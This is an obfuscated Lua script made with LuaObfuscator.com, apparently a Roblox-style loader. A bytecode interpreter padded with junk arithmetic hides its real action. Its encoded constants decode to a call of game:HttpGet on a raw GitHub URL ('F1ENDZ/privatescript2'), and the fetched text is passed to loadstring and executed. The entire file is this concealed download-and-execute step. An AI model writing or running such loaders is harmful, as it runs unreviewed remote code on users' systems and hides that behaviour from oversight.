--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v78=v5(v69,v19);v19=nil;return v78;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if ((1149 -(888 + 261))==v70) then v71=(v31/((744 -(169 + 573))^(v32-1)))%((5 -3)^(((v33-(1579 -((1735 -(911 + 60)) + 814))) -(v32-((2 -1) + 0))) + (3 -2))) ;return v71-(v71%(2 -1)) ;end end else local v72=0 -0 ;local v73;while true do if (v72==(105 -(53 + 52))) then v73=(1 + 1)^(v32-((411 + 228) -(148 + 490))) ;return (((v31%(v73 + v73))>=v73) and (1 + (497 -(450 + 47)))) or 0 ;end end end end local function v21()local v34=0 -(713 -(250 + 463)) ;local v35;while true do if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=1 + 0 ;end if (v34==(1 -(436 -(334 + 102)))) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (2 -0) ;return (v37 * (705 -449)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (438 -(23 + 145 + 266)) ;return (v41 * (16777669 -(334 + 119))) + (v40 * (16163 + 49373)) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=503 -(196 + 303 + 3) ;local v45=(v20(v43,1,596 -(220 + 356) ) * ((229 -(124 + 103))^32)) + v42 ;local v46=v20(v43,12 + 9 ,20 + 11 );local v47=((v20(v43,23 + 9 )==((2159 -(1557 + 330)) -(142 + 129))) and  -(1592 -(16 + 1170 + 405))) or (3 -(3 -1)) ;if (v46==(0 + 0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else local v79=0;while true do if (v79==0) then v46=1 -0 ;v44=0 -0 ;break;end end end elseif (v46==(7925 -5878)) then return ((v45==(0 + 0)) and (v47 * ((2 -1)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(3367 -2344) ) * (v44 + (v45/(2^(132 -80)))) ;end local function v25(v48)local v49;if  not v48 then local v74=0 + 0 + 0 ;while true do if (v74==(0 -0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(356 -(35 + 320)) );v18=v18 + v48 ;local v50={};for v67=715 -(140 + 574) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==0) then v52=0 -0 ;v53=nil;v51=1 + 0 ;end if (v51==1) then v54=nil;v55=nil;v51=2;end if (v51==(19 -15)) then while true do if (v52==2) then local v95=0;while true do if (v95==(1 + 0)) then v52=1 + 2 ;break;end if (v95~=0) then else v57=nil;v58=nil;v95=1;end end end if (v52~=(2 + 1)) then else v59=nil;while true do local v102=0 + 0 ;while true do if (v102~=(1291 -(352 + 939))) then else if (v53==2) then local v107=0 + 0 ;local v108;while true do if (v107~=(0 + 0)) then else v108=0;while true do if (v108==(0 + 0)) then for v134=1,v58 do local v135=0;local v136;local v137;local v138;local v139;while true do if (v135==0) then v136=772 -(14 + 758) ;v137=nil;v135=1;end if (v135~=1) then else v138=nil;v139=nil;v135=5 -3 ;end if (v135==2) then while true do if (v136==1) then v139=nil;while true do if (v137~=(1439 -(182 + 1257))) then else local v167=0;while true do if (v167~=(1 -0)) then else v137=1;break;end if (v167==0) then v138=v21();v139=nil;v167=1;end end end if (v137==1) then if (v138==(1 + 0)) then v139=v21()~=0 ;elseif (v138==(2 + 0)) then v139=v24();elseif (v138~=3) then else v139=v25();end v59[v134]=v139;break;end end break;end if ((0 -0)~=v136) then else local v159=0;while true do if (v159~=1) then else v136=1;break;end if (v159~=(0 -0)) then else v137=0;v138=nil;v159=1;end end end end break;end end end v57[3]=v21();v108=1 + 0 ;end if (v108~=(2 -1)) then else for v140=1116 -(34 + 1081) ,v23() do local v141=0;local v142;local v143;local v144;while true do if (v141==(0 + 0)) then v142=0 -0 ;v143=nil;v141=1;end if (1==v141) then v144=nil;while true do if (v142~=(1 -0)) then else while true do if (v143~=(0 -0)) then else v144=v21();if (v20(v144,1 -0 ,1 -0 )~=0) then else local v169=0;local v170;local v171;local v172;local v173;local v174;while true do if (v169~=(5 -3)) then else v174=nil;while true do if (v170~=1) then else local v179=0;local v180;while true do if (v179~=0) then else v180=0;while true do if (v180==1) then v170=1 + 1 ;break;end if (v180~=(0 -0)) then else v173=nil;v174=nil;v180=1702 -(1504 + 197) ;end end break;end end end if (v170~=2) then else while true do if (v171==3) then if (v20(v173,1 + 2 ,3)~=(1 -0)) then else v174[4]=v59[v174[4]];end v54[v140]=v174;break;end if (v171~=(3 -2)) then else local v183=0 -0 ;local v184;while true do if (v183==(0 -0)) then v184=774 -(577 + 197) ;while true do if (v184~=(0 -0)) then else local v192=0;while true do if (v192==0) then v174={v22(),v22(),nil,nil};if (v172==(0 -0)) then local v196=0;local v197;local v198;while true do if (v196~=0) then else v197=0;v198=nil;v196=1;end if ((733 -(142 + 590))==v196) then while true do if (v197==0) then v198=0;while true do if (v198==0) then v174[3]=v22();v174[1258 -(263 + 991) ]=v22();break;end end break;end end break;end end elseif (v172==1) then v174[3]=v23();elseif (v172==2) then v174[3 + 0 ]=v23() -(2^(15 + 1)) ;elseif (v172==3) then local v205=0;local v206;local v207;while true do if (v205==1) then while true do if (v206==(0 + 0)) then v207=0;while true do if (v207~=(0 -0)) then else v174[3]=v23() -(2^16) ;v174[4 + 0 ]=v22();break;end end break;end end break;end if (0~=v205) then else v206=0 + 0 ;v207=nil;v205=1;end end end v192=1;end if (v192==(1 + 0)) then v184=1137 -(601 + 535) ;break;end end end if (v184==(1 + 0)) then v171=2;break;end end break;end end end if (v171==0) then local v185=0 -0 ;local v186;local v187;while true do if (v185==(1356 -(90 + 1266))) then v186=0 -0 ;v187=nil;v185=1;end if (v185~=(3 -2)) then else while true do if (v186~=(1420 -(1021 + 399))) then else v187=591 -(339 + 252) ;while true do if (v187~=(1156 -(47 + 1108))) then else v171=1 + 0 ;break;end if (v187==(0 -0)) then local v194=464 -(13 + 451) ;local v195;while true do if (v194==0) then v195=654 -(535 + 119) ;while true do if (v195~=(0 -0)) then else v172=v20(v144,2,3);v173=v20(v144,1 + 3 ,2 + 4 );v195=1;end if (1~=v195) then else v187=1;break;end end break;end end end end break;end end break;end end end if (2~=v171) then else local v188=1987 -(16 + 1971) ;while true do if (v188==(3 -2)) then v171=3;break;end if (v188~=0) then else local v191=0;while true do if (v191==(1 + 0)) then v188=1;break;end if (0==v191) then local v193=1296 -(286 + 1010) ;while true do if (v193~=0) then else if (v20(v173,1,1)==(1153 -(976 + 176))) then v174[719 -(348 + 369) ]=v59[v174[343 -(123 + 218) ]];end if (v20(v173,353 -(291 + 60) ,2)==1) then v174[3]=v59[v174[4 -1 ]];end v193=1 + 0 ;end if (v193~=(1854 -(381 + 1472))) then else v191=1;break;end end end end end end end end break;end if (v170==(0 -0)) then local v181=0;while true do if ((1 + 0)~=v181) then else v170=1;break;end if (v181~=(0 -0)) then else v171=0 + 0 ;v172=nil;v181=1;end end end end break;end if (v169==(0 -0)) then local v177=0 + 0 ;while true do if (v177==(0 -0)) then v170=0;v171=nil;v177=1;end if (v177~=(1278 -(859 + 418))) then else v169=1 + 0 ;break;end end end if (v169==1) then local v178=542 -(249 + 293) ;while true do if (v178==(67 -(30 + 36))) then v169=1122 -(584 + 536) ;break;end if (0~=v178) then else v172=nil;v173=nil;v178=1 -0 ;end end end end end break;end end break;end if (v142==0) then local v160=0;while true do if (v160==(1 + 0)) then v142=1 + 0 ;break;end if (v160~=0) then else v143=276 -(165 + 111) ;v144=nil;v160=1;end end end end break;end end end v53=1 + 2 ;break;end end break;end end end if (v53==(0 + 0)) then local v109=0 + 0 ;while true do if (v109~=0) then else v54={};v55={};v109=1;end if (v109~=(1 + 0)) then else v56={};v53=1 + 0 ;break;end end end v102=1;end if (v102==1) then if (v53==(3 -0)) then local v110=1282 -(1017 + 265) ;local v111;while true do if (v110~=(921 -(41 + 880))) then else v111=0;while true do local v116=0;while true do if (v116~=0) then else if (v111==(0 -0)) then local v145=0 + 0 ;while true do if (v145~=1) then else v111=405 -(72 + 332) ;break;end if (v145~=(0 -0)) then else for v161=463 -(174 + 288) ,v23() do v55[v161-1 ]=v28();end for v163=2 -1 ,v23() do v56[v163]=v23();end v145=1488 -(1447 + 40) ;end end end if (v111~=1) then else return v57;end break;end end end break;end end end if (v53==(1763 -(373 + 1389))) then local v112=0;local v113;while true do if (v112~=(439 -(328 + 111))) then else v113=1193 -(491 + 702) ;while true do if (v113==(0 + 0)) then local v122=0;while true do if (v122~=(0 + 0)) then else v57={v54,v55,nil,v56};v58=v23();v122=1 + 0 ;end if (v122==(441 -(299 + 141))) then v113=2 -1 ;break;end end end if ((1 + 0)==v113) then v59={};v53=2;break;end end break;end end end break;end end end break;end if ((406 -(140 + 266))~=v52) then else local v96=0 -0 ;while true do if (v96==(0 -0)) then v53=0;v54=nil;v96=1;end if (v96==(1 + 0)) then v52=1 + 0 ;break;end end end if (v52==(1 + 0)) then local v97=0 -0 ;while true do if (v97==(0 -0)) then v55=nil;v56=nil;v97=272 -(238 + 33) ;end if (v97==(1 + 0)) then v52=1705 -(544 + 1159) ;break;end end end end break;end if (v51~=(1 + 1)) then else v56=nil;v57=nil;v51=3;end if (v51==3) then v58=nil;v59=nil;v51=8 -4 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v80=1;local v81= -1;local v82={...};local v83=v12("#",...) -1 ;local function v84()local v85=v64;local v86=v65;local v87=v66;local v88=v27;local v89={};local v90={};local v91={};for v98=0 -0 ,v83 do if ((v98>=v87) or ((3261 -(320 + 525))<(506 + (1827 -(58 + 1509))))) then v89[v98-v87 ]=v82[v98 + (358 -(162 + 195)) ];else v91[v98]=v82[v98 + 1 ];end end local v92=(v83-v87) + (2 -1) ;local v93;local v94;while true do local v99=536 -(24 + 512) ;local v100;while true do if (((2423 -(1395 + 199))<=(4220 -3085)) and (v99==(0 + 0))) then v100=0 -0 ;while true do if ((v100==(0 -0)) or ((2507 + 1879)<(1756 + 2044))) then v93=v85[v80];v94=v93[1];v100=1 + 0 ;end if ((v100==(168 -(109 + 58))) or ((584 + 155)>(2007 + 298))) then if (((1823 -(792 + 661))==(280 + 90)) and (v94<=(1961 -(995 + (2928 -1964))))) then if ((v94<=(0 -0)) or ((1885 -(5 + (1664 -(893 + 682))))<(121 + 498))) then local v117=0 -0 ;local v118;local v119;local v120;while true do if (((2048 -(847 + 225))<(5917 -3409)) and ((26 -((1574 -(430 + 1125)) + 6))==v117)) then v120=nil;while true do if ((v118==(0 + (0 -0))) or ((10977 -(8212 -(1104 + 141)))>=(2480 + (1903 -(182 + 138))))) then local v150=0;while true do if ((v150==(595 -(241 + 36 + 317))) or (((1031 + 1507) -(1696 + 24))>(407 + 866))) then v118=1209 -(1110 + 98) ;break;end if (((2476 -(1157 + 311))>=(855 -(328 + 490))) and (v150==(1606 -(308 + 1298)))) then v119=v93[442 -((1863 -1424) + 1) ];v120=v91[v93[749 -(641 + 105) ]];v150=1954 -(432 + 1521) ;end end end if (((3435 -(1352 + 544))==(2567 -(616 + 412))) and (v118==1)) then v91[v119 + 1 + (283 -(264 + 19)) ]=v120;v91[v119]=v120[v93[10 -6 ]];break;end end break;end if ((v117==(455 -(331 + 124))) or ((175 + 33 + 231)<(86 + 1))) then v118=0 -0 ;v119=nil;v117=1 + 0 ;end end elseif (((364 + 1779)<=(3826 -(337 + 211))) and (v94==(1 + 0))) then do return;end else v91[v93[2 + 0 ]]=v62[v93[3 + 0 ]];end elseif ((v94<=(1754 -(997 + 753))) or ((833 + 1887)==(3923 + 344))) then if (((993 + 8 + 65)>=914) and (v94>(1420 -(1334 + 83)))) then v91[v93[(23 + 1107) -(55 + 1073) ]]=v93[391 -(265 + 123) ];else v91[v93[711 -(117 + 592) ]]();end elseif ((v94==(1104 -(364 + 735))) or ((1756 + 543)>(256 + 4002))) then local v127=0 + 0 + 0 ;local v128;local v129;local v130;local v131;while true do if ((v127==(1585 -(1009 + 576))) or ((3171 -(1338 + 223))>=(941 + 2662))) then local v146=0 -0 ;while true do if (((2769 -(1928 + 68))<=(2743 + 747)) and (v146==(1 + 0))) then v127=791 -(205 + 585) ;break;end if (((0 + (753 -(103 + 650)))==v146) or ((4589 -(765 + 692))>=(4784 -(191 + 896 + 374)))) then v128=v93[1 + 1 ];v129,v130=v88(v91[v128](v13(v91,v128 + (1654 -(625 + 1028)) ,v93[3 + 0 ])));v146=1 + 0 ;end end end if ((v127==(1563 -((642 -(114 + 175)) + 1209))) or ((5498 -(1403 + 57))<(8357 -5446))) then local v147=0 + 0 ;while true do if ((v147==(1 + 0)) or ((2201 -(1099 + 650))>=((7367 + 1369) -3957))) then v127=2 + 0 ;break;end if (((2932 -(511 + 555))<=3724) and (v147==(0 -0))) then v81=(v130 + v128) -(171 -(158 + 12)) ;v131=(0 -0) + 0 ;v147=1 -0 ;end end end if ((v127==2) or ((2766 + 1345)<(3451 -(500 + 1081)))) then for v154=v128,v81 do local v155=1146 -(218 + 928) ;local v156;local v157;while true do if ((((1949 -(237 + 1335)) + 83)==(448 + (343 -(19 + 312)))) and (v155==(3 -2))) then while true do if ((v156==(0 + 0)) or ((2548 -(500 + 320))<(347 + 131))) then v157=0 + 0 ;while true do if (((2298 -((364 -(35 + 236)) + 137))<=(4025 + 704)) and (v157==(1063 -(263 + 800)))) then v131=v131 + 1 + 0 ;v91[v154]=v129[v131];break;end end break;end end break;end if (((3369 -(1415 + 137))==(1347 + 470)) and (v155==(0 + (882 -(366 + 516))))) then v156=0 + 0 ;v157=nil;v155=1767 -(1098 + 668) ;end end end break;end end else local v132=281 -(251 + 30) ;local v133;while true do if (((362 -226)<(85 + 257)) and ((0 -0)==v132)) then v133=v93[2 + 0 ];v91[v133]=v91[v133](v13(v91,v133 + (1444 -(622 + (2201 -(607 + 773)))) ,v81));break;end end end v80=v80 + (2 -1) ;break;end end break;end end end end A,B=v27(v11(v84));if  not A[1] then local v101=v60[4][v80] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403423O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4631454E445A2F70726976617465736372697074322F6D61696E2F7072692O7600083O0012023O00013O001202000100023O00202O000100010003001204000300044O0005000100034O00065O00022O00033O000100012O00013O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
